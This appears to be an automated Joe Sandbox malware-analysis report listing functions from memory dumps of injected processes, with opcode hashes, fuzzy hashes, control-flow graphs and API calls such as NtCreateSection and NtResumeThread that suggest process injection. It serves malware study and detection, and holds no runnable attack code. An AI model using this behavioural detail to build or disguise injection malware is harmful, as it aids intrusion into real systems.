                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: ^Q2
                                                                                                                                                                                    • API String ID: 3446177414-3458373168
                                                                                                                                                                                    • Opcode ID: 8b3f709bdd2ced20095658eddb8d706d11306f1edd554866eb8901bc9af1b6ce
                                                                                                                                                                                    • Instruction ID: 0ce8f09471ac0ade335dbebb5f0183bdf8e1d2d27a9917141672405d95c33d2c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b3f709bdd2ced20095658eddb8d706d11306f1edd554866eb8901bc9af1b6ce
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B41AFB9A40201DFEB05CF29D4805557BF5FF89750B54846AEC09DB361CB31FA81CBA0
                                                                                                                                                                                    Function 3251DF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: 0$0
                                                                                                                                                                                    • API String ID: 3446177414-203156872
                                                                                                                                                                                    • Opcode ID: b6e2ffc8c058d9c2625f77734e0f981faac7490b03576bfdceca5981ecf9aa86
                                                                                                                                                                                    • Instruction ID: 0d7b7d02154b4f291f798e03cb05996b366e52d3a2fa73db0c26cd3ee7a298ec
                                                                                                                                                                                    • Opcode Fuzzy Hash: b6e2ffc8c058d9c2625f77734e0f981faac7490b03576bfdceca5981ecf9aa86
                                                                                                                                                                                    • Instruction Fuzzy Hash: F5417BB56097019FE700CF28C444A5ABBE4BF88358F004A2EF988DB301D771EB45CB86
                                                                                                                                                                                    Function 3251E880 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: Q2$mQ2
                                                                                                                                                                                    • API String ID: 3446177414-1431127304
                                                                                                                                                                                    • Opcode ID: 9ac38d4c8e2bea83fbe222cc4d27100380fc9ee2136f40acde247f4cff274a91
                                                                                                                                                                                    • Instruction ID: eedbe6aa859636d1a82554e8e4a5006385286dcf2149b745fa05d77a86ce5625
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ac38d4c8e2bea83fbe222cc4d27100380fc9ee2136f40acde247f4cff274a91
                                                                                                                                                                                    • Instruction Fuzzy Hash: EC11C3B6A01208AFDF11CF98D985ADEBBB8FF4C360F10401AF911B7240D775AA54CBA0

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:1.5%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                    Total number of Nodes:30
                                                                                                                                                                                    Total number of Limit Nodes:0
                                                                                                                                                                                    execution_graph 5227 411b670 5229 411b628 5227->5229 5228 411b725 SleepEx 5228->5229 5230 411b76f NtCreateSection 5228->5230 5229->5228 5231 411b62d 5229->5231 5230->5231 5238 411b6e8 5239 411b725 SleepEx 5238->5239 5240 411b71f 5239->5240 5241 411b76f NtCreateSection 5239->5241 5240->5239 5242 411b74c 5240->5242 5241->5242 5212 411fa6b 5214 411fa70 5212->5214 5213 411fb6f 5214->5213 5216 411b88d 5214->5216 5217 411b8b3 5216->5217 5218 411b8e1 SleepEx 5217->5218 5220 411b8d2 5217->5220 5218->5217 5221 411b915 5218->5221 5219 411b94e NtResumeThread 5219->5220 5220->5213 5221->5219 5221->5220 5232 411b6aa 5233 411b6cb 5232->5233 5236 411b710 5232->5236 5234 411b725 SleepEx 5235 411b76f NtCreateSection 5234->5235 5234->5236 5237 411b74c 5235->5237 5236->5234 5236->5237 5222 411b6ff 5224 411b6ad 5222->5224 5223 411b725 SleepEx 5223->5224 5225 411b76f NtCreateSection 5223->5225 5224->5222 5224->5223 5226 411b6cb 5224->5226 5225->5226

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 0411B670 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 194COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 0 411b670-411b671 1 411b673 0->1 2 411b6c4-411b6c9 0->2 3 411b678-411b67f 1->3 4 411b710-411b71e 2->4 5 411b6cb-411b6d8 2->5 7 411b681-411b69c 3->7 8 411b6a2-411b6a6 3->8 6 411b71f-411b72b SleepEx 4->6 11 411b72d-411b731 6->11 12 411b76f-411b7c4 NtCreateSection 6->12 7->8 8->2 10 411b628-411b62b 8->10 10->3 13 411b62d-411b65b 10->13 14 411b733-411b740 call 4128a5d 11->14 15 411b745-411b74a 11->15 16 411b7c6-411b7df 12->16 17 411b74c-411b753 12->17 14->15 15->6 15->17 16->17 22 411b7e5-411b824 16->22 20 411b755-411b76e 17->20 22->17 24 411b82a-411b868 22->24 24->17 26 411b86e-411b886 24->26 26->20
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.5983933539.0000000003E10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_3e10000_RAVCpl64.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 0$@$@
                                                                                                                                                                                    • API String ID: 0-3221051908
                                                                                                                                                                                    • Opcode ID: 23772eb120ee915ce1b95691db6e1b41989a63e0cf482548256b4cc0f84638c5
                                                                                                                                                                                    • Instruction ID: f67ba7619ef9a88e9f1532ab758d51ec512299be1fd4880ce59995a43e092073
                                                                                                                                                                                    • Opcode Fuzzy Hash: 23772eb120ee915ce1b95691db6e1b41989a63e0cf482548256b4cc0f84638c5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A61BA71A28B188FCB15DF54D8816DABBE4FF58700F10026EE85A97291DB34E646CBC6
                                                                                                                                                                                    Function 0411B88D Relevance: 3.1, APIs: 2, Instructions: 92nativethreadCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.5983933539.0000000003E10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_3e10000_RAVCpl64.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ResumeSleepThread
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1530989685-0
                                                                                                                                                                                    • Opcode ID: 3ccdf1dd1650dff53bd1ec06617559932113fcbfc937b47eff02d5e28373bae8
                                                                                                                                                                                    • Instruction ID: e3bf187de2e8856be03b25698bd50eb95785aad9b2a5adfc0f57081501b2549b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ccdf1dd1650dff53bd1ec06617559932113fcbfc937b47eff02d5e28373bae8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0121B37061CB8D8FEB58EF6884956AAB7E0FB44314F01073EE99AC3290EB34F5518B45
                                                                                                                                                                                    Function 0411B6FF Relevance: 1.6, APIs: 1, Instructions: 67nativeCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 47 411b6ff-411b70a 48 411b6ad 47->48 49 411b70c-411b70e 47->49 50 411b6af-411b6c9 48->50 51 411b6fe 48->51 52 411b710-411b71e 49->52 50->52 54 411b6cb-411b6d8 50->54 51->47 53 411b71f-411b72b SleepEx 52->53 56 411b72d-411b731 53->56 57 411b76f-411b7c4 NtCreateSection 53->57 58 411b733-411b740 call 4128a5d 56->58 59 411b745-411b74a 56->59 60 411b7c6-411b7df 57->60 61 411b74c-411b753 57->61 58->59 59->53 59->61 60->61 65 411b7e5-411b824 60->65 63 411b755-411b76e 61->63 65->61 67 411b82a-411b868 65->67 67->61 69 411b86e-411b886 67->69 69->63
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.5983933539.0000000003E10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_3e10000_RAVCpl64.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateSectionSleep
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2866269021-0
                                                                                                                                                                                    • Opcode ID: a30f3fe63698082d7a2e4efaac99c8114b46f0a43e053e84e2d4b858ee7fa1e8
                                                                                                                                                                                    • Instruction ID: 684e4e3727648c3e72b99870f0a670c65a4b7d5248f1679ed43a6e42a93595e4
                                                                                                                                                                                    • Opcode Fuzzy Hash: a30f3fe63698082d7a2e4efaac99c8114b46f0a43e053e84e2d4b858ee7fa1e8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D117A72D1CB148AD76A6F549C822E83752FF41311F6006B9C854575A2EB337452C2C6
                                                                                                                                                                                    Function 0411B6E8 Relevance: 1.5, APIs: 1, Instructions: 40nativeCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 70 411b6e8-411b6fa 71 411b725-411b72b SleepEx 70->71 72 411b72d-411b731 71->72 73 411b76f-411b7c4 NtCreateSection 71->73 74 411b733-411b740 call 4128a5d 72->74 75 411b745-411b74a 72->75 76 411b7c6-411b7df 73->76 77 411b74c-411b753 73->77 74->75 75->77 79 411b71f-411b724 75->79 76->77 82 411b7e5-411b824 76->82 80 411b755-411b76e 77->80 79->71 82->77 84 411b82a-411b868 82->84 84->77 86 411b86e-411b886 84->86 86->80
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.5983933539.0000000003E10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_3e10000_RAVCpl64.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateSectionSleep
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2866269021-0
                                                                                                                                                                                    • Opcode ID: 0fb47c5ba29e04789db5c6a1a1884fb94d5299937d6a96ca76d543d2ddb73158
                                                                                                                                                                                    • Instruction ID: cb2bf4290a9e4c62af0b18e9c21f07dc718dd2ba6770222b4b69e65c7edcebef
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0fb47c5ba29e04789db5c6a1a1884fb94d5299937d6a96ca76d543d2ddb73158
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7DF0593290CB084BE7096F88E8822FE73D1FB45370F200236C465026A0F77AB06282C5

                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                    Function 04117D06 Relevance: .1, Instructions: 148COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.5983933539.0000000003E10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_3e10000_RAVCpl64.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 0dcadc640b22b38efd17b659c21168140e25948fbbf73ba5134c53d695fac3b5
                                                                                                                                                                                    • Instruction ID: ecd4c25c9ba7f136c729cb0e03845fe87d9e6d91df28b30018fba68c3431bfc0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0dcadc640b22b38efd17b659c21168140e25948fbbf73ba5134c53d695fac3b5
                                                                                                                                                                                    • Instruction Fuzzy Hash: B941D871619B0D4FD728AF68D0C12B6B3E1FB45304F50093DD996C33A2E770F8558685

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:0.4%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                    Total number of Nodes:9
                                                                                                                                                                                    Total number of Limit Nodes:1
                                                                                                                                                                                    execution_graph 68297 4ca2b20 68299 4ca2b2a 68297->68299 68300 4ca2b3f LdrInitializeThunk 68299->68300 68301 4ca2b31 68299->68301 68302 4b2effe 68303 4b2f02d 68302->68303 68304 4b2f198 NtQueryInformationProcess 68303->68304 68305 4b2f1d2 68303->68305 68304->68305 68312 4ca29f0 LdrInitializeThunk

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 04B2EFFE Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 547nativeCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 0 4b2effe-4b2f02b 1 4b2f049-4b2f069 call 4b31258 call 4b2d008 0->1 2 4b2f02d-4b2f044 call 4b31238 0->2 8 4b2f624-4b2f62f 1->8 9 4b2f06f-4b2f16f call 4b2ef38 call 4b31258 call 4b351c4 call 4b20398 call 4b30818 call 4b20398 call 4b30818 call 4b32f28 1->9 2->1 26 4b2f175-4b2f1cd call 4b20398 call 4b30818 NtQueryInformationProcess call 4b31258 9->26 27 4b2f618-4b2f61f call 4b2ef38 9->27 34 4b2f1d2-4b2f203 call 4b20398 call 4b30818 26->34 27->8 39 4b2f217-4b2f28d call 4b351d2 call 4b20398 call 4b30818 34->39 40 4b2f205-4b2f212 34->40 39->40 49 4b2f293-4b2f2a2 call 4b351fc 39->49 40->27 52 4b2f2a4-4b2f2ea call 4b31f48 49->52 53 4b2f2ef-4b2f32f call 4b20398 call 4b30818 call 4b33888 49->53 52->27 63 4b2f331-4b2f349 53->63 64 4b2f34e-4b2f43e call 4b20398 call 4b30818 call 4b3520a call 4b20398 call 4b30818 call 4b33248 call 4b31208 * 3 call 4b351fc 53->64 63->27 87 4b2f440-4b2f46c call 4b351fc call 4b31208 call 4b3525e call 4b35218 64->87 88 4b2f46e-4b2f483 call 4b351fc 64->88 99 4b2f4c3-4b2f4cd 87->99 94 4b2f485-4b2f4a7 call 4b329f8 88->94 95 4b2f4ac-4b2f4be call 4b31e88 88->95 94->95 95->99 101 4b2f4d3-4b2f51d call 4b20398 call 4b30818 call 4b33568 call 4b351fc 99->101 102 4b2f595-4b2f5f8 call 4b20398 call 4b30818 call 4b33ba8 99->102 121 4b2f552-4b2f559 101->121 122 4b2f51f-4b2f548 call 4b352a8 call 4b3525e 101->122 102->27 127 4b2f5fa-4b2f613 call 4b31238 102->127 124 4b2f565-4b2f570 121->124 125 4b2f55b-4b2f563 call 4b351fc 121->125 122->121 124->102 129 4b2f572-4b2f590 call 4b33ec8 124->129 125->102 125->124 127->27 129->102
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • NtQueryInformationProcess.NTDLL ref: 04B2F1B7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.2900017391.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_4b20000_grpconv.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InformationProcessQuery
                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                    • API String ID: 1778838933-4108050209
                                                                                                                                                                                    • Opcode ID: 24af1654e36000b7d7e7fe176e5539e6920882dc5509bee690fe3562c6c2add7
                                                                                                                                                                                    • Instruction ID: 42e45b059948210d8876ec0a6ec896c397c79cc9fd7d009e70ad022b3e1f26da
                                                                                                                                                                                    • Opcode Fuzzy Hash: 24af1654e36000b7d7e7fe176e5539e6920882dc5509bee690fe3562c6c2add7
                                                                                                                                                                                    • Instruction Fuzzy Hash: E2023C70518A8C8FDFA9EF68C8946EE77E1FB99309F00465AE84AC7240DF34E641CB41
                                                                                                                                                                                    Function 04CA34E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 152 4ca34e0-4ca34ec LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 7139a04fa1901482a7d7697ae16100445ec1f6514c6498500908a2cc6e49fe9c
                                                                                                                                                                                    • Instruction ID: 9cce3105dd96747ee2c641966da466f9c65e48150e924f0c0c5b9bf057239427
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7139a04fa1901482a7d7697ae16100445ec1f6514c6498500908a2cc6e49fe9c
                                                                                                                                                                                    • Instruction Fuzzy Hash: D190027160510403F50071584614786100A87D0249F61C815A0C1556CDC7A6DD5175F2
                                                                                                                                                                                    Function 04CA2CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 148 4ca2cf0-4ca2cfc LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 71e0442cc4cd54da6beec070707c08b4eafd97f9388952bfedc65f27e1ebd8b5
                                                                                                                                                                                    • Instruction ID: 10566bae0943117750a73eeebff1384930d4e367515e49f1d72ef3884bb6d34b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 71e0442cc4cd54da6beec070707c08b4eafd97f9388952bfedc65f27e1ebd8b5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 43900261242041537945B1584504587400B97E0289B91C416A1C05954CC537EC56E671
                                                                                                                                                                                    Function 04CA2C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 147 4ca2c30-4ca2c3c LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 5005dd486b963a50c70e27b7205ac2502c20eda84b9c96f2fb9b02820c773f80
                                                                                                                                                                                    • Instruction ID: 8043d87be2997ed501604cffab3d36918ce6c786851d75e26893dfb21a2ddc01
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5005dd486b963a50c70e27b7205ac2502c20eda84b9c96f2fb9b02820c773f80
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4090026921300003F5807158550868A000A87D124AF91D819A080655CCC926DC696371
                                                                                                                                                                                    Function 04CA2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 149 4ca2d10-4ca2d1c LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 3a0a3bb17b69fa1d66f5d91a5e3fd2ba0c552280ac428dd2122ccff9a4d25eae
                                                                                                                                                                                    • Instruction ID: 76f0f8973bddc7f6f0d5c2da24a61540adee1d11e4c36f184efe8356c94b5965
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a0a3bb17b69fa1d66f5d91a5e3fd2ba0c552280ac428dd2122ccff9a4d25eae
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2190027120100413F51171584604787000E87D0289F91C816A0C1555CDD667DD52B171
                                                                                                                                                                                    Function 04CA2E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 150 4ca2e50-4ca2e5c LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: a66f1a4d6c9bf3b24d2ad41f7da5505b2b19172b21fe2e25d10e73acd307531f
                                                                                                                                                                                    • Instruction ID: 870d8ce9c5958c20d8ee1546c9a9fd36477edd0e6d229f614bcf5017afb00cf5
                                                                                                                                                                                    • Opcode Fuzzy Hash: a66f1a4d6c9bf3b24d2ad41f7da5505b2b19172b21fe2e25d10e73acd307531f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 869002A134100443F50071584514B86000AC7E1349F51C419E1855558DC62ADC527176
                                                                                                                                                                                    Function 04CA2F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 151 4ca2f00-4ca2f0c LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 134d7b831130d9ccb74a21adb89a59669e75b4ce55aaa84357bacf4507201328
                                                                                                                                                                                    • Instruction ID: 6c0eb573c99baf179fd27ee7230015291d2b3a4bcc7861ccc97f287998f9e528
                                                                                                                                                                                    • Opcode Fuzzy Hash: 134d7b831130d9ccb74a21adb89a59669e75b4ce55aaa84357bacf4507201328
                                                                                                                                                                                    • Instruction Fuzzy Hash: AC90026121180043F60075684D14B87000A87D034BF51C519A0945558CC926DC616571
                                                                                                                                                                                    Function 04CA29F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 140 4ca29f0-4ca29fc LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
